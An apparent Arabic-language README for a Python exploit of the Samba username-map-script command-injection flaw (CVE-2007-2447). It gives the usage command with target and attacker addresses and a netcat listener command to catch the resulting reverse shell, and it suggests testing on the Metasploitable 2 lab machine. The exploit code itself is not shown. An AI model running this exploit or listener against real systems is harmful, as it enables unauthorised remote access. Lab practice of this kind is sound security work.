
استغلال بلغة Python لثغرة CVE-2007-2447 التي تُفعّل حقن أوامر في سكربت خريطة أسماء المستخدمين في Samba لفتح قشرة عكسية على الأهداف الضعيفة.
لاختبار السكربت، أوصيك باستخدام الجهاز الافتراضي "metasploitable 2" المتاح هنا. سيظهر السكربت قشرة عكسية إذا نجح الاستغلال. للحصول على الاتصال، فقط افتح جلسة netcat مثل:
netcat -lnvp <port>
py CVE-2007-2447.py 192.168.1.38 1337 192.168.1.14
وعلى netcat الخاص بي :
netcat -lnvp 1337
النتيجة :
netcat :
alt text
وعلى السكربت:
alt text
استخدمت حمولة من ورقة غش. الرابط متاح هنا. يمكنك استبدالها بحمولات أخرى.